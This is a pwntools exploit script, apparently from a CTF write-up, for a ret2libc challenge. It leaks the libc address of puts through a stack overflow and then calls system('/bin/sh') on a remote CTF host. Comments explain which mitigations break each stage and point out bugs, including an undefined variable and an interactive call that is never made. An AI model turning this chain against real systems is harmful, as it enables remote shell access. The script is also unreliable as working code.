Return that ROPe
ret2Lib PWN chall
from pwn import *

# CTF write-up script: a two-stage ret2libc chain over a stack overflow in the
# challenge binary. Read it as a demonstration of what the classic mitigations
# defeat: every step relies on a fixed code address (non-PIE, inferred from the
# hard-coded gadget address further down), a readable GOT entry, and an
# unchecked write past a 40-byte buffer. A stack canary, PIE, or full RELRO would
# each break a different stage of this chain.
#
# Indentation of the if/elif bodies below was lost in the page extraction and is
# restored here; no other token is changed.
LOCAL = False
REMOTETTCP = True
# Target of the remote run (CTF infrastructure, as given in the write-up).
host= 'challenges.ctf.cert.rcts.pt'
port=41135
# Challenge binary, pre-patched (presumably with the matching loader/libc).
LOCAL_BIN = "./rop_patched"
context.clear(arch='amd64')
# libc build the challenge is linked against; its symbol offsets are what turn
# the leaked puts address into a libc base.
LIBC = ELF("libc6_2.27-3ubuntu1.4_amd64.so")
if LOCAL:
    P = process(LOCAL_BIN)
    ELF_LOADED = ELF(LOCAL_BIN)
    ROP_LOADED = ROP(ELF_LOADED)
elif REMOTETTCP:
    P = remote(host,port)
    ELF_LOADED = ELF(LOCAL_BIN)
    ROP_LOADED = ROP(ELF_LOADED)
# NOTE(review): with both flags False, P / ELF_LOADED / ROP_LOADED are never
# bound and the script fails with NameError below; an explicit `else:` that
# exits would make the mode selection fail loudly.

# Distance from the start of the overflowed buffer to the saved return address.
# The value was determined outside this script (e.g. with a cyclic pattern);
# nothing here derives it.
OFFSET = b'A'*40
# Addresses taken from the binary itself: usable as constants only because the
# binary's code segment is at a fixed address (non-PIE, inferred).
PUTSGOT = ELF_LOADED.got['puts']
MAIN = ELF_LOADED.symbols['main']
PUTSPLT = ELF_LOADED.plt['puts']
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0]
RET = (ROP_LOADED.find_gadget(['ret']))[0]
log.info("puts@plt: " + hex(PUTSPLT) )
log.info("puts@got: " + hex(PUTSGOT))
log.info("pop rdi gadget: " + hex(POP_RDI))

# Stage 1 - leak: call puts(puts@got) so the process prints the resolved libc
# address of puts, then return into main so a second payload can be sent.
# This stage is exactly what partial RELRO + a readable GOT make possible.
payload = OFFSET
payload += p64(POP_RDI)
payload += p64(PUTSGOT)
payload += p64(PUTSPLT)
payload += p64(MAIN)
P.sendline(payload)
# Fragile: assumes the leak is the third of exactly four lines the program
# prints in response. Any change in the challenge's output breaks this.
leakedlib=P.recvlines(4)[2]
# NOTE(review): `a` is not defined anywhere in this script; the received line
# was bound to `leakedlib` on the previous line, so this raises NameError as
# written. The ljust(8, b'\x00') pads the 6 significant bytes of a canonical
# user-space address to the 8 bytes u64 expects.
leak = u64(a.strip().ljust(8, b'\x00'))
log.info("Leaked puts@got: %s" % hex(leak)) # Leaked libc address of puts; the libc build was identified from it.
# Libc base = leaked address - offset of puts within that libc build. Correct
# only if LIBC is the same build as the remote's; otherwise every later offset
# is wrong.
LIBC.address = leak - LIBC.sym["puts"]
log.info("Address of libc %s " % hex(LIBC.address))

# Stage 2 - after main re-runs, call system("/bin/sh") with addresses rebased
# onto the leaked libc.
BINSH = next(LIBC.search(b"/bin/sh"))
SYSTEM = LIBC.sym["system"]
# NOTE(review): this rebinds the RET found by find_gadget above with a
# hard-coded address; the earlier lookup is therefore dead. The extra `ret`
# keeps the stack 16-byte aligned before entering system(), which glibc 2.27's
# SSE-using code paths require.
RET = 0x0000000000401016 # RET for stack alignment.
payload = OFFSET + p64(POP_RDI) + p64(BINSH) +p64(RET)+ p64(SYSTEM)
# Stage 1 used a bare sendline; stage 2 waits for the prompt first. Either
# both stages should synchronise on the prompt or neither.
P.sendlineafter(b'Can you ROP it?',payload)
# NOTE(review): `P.interactive` is referenced but not called (missing `()`),
# so the script exits without handing the connection to the user.
P.interactive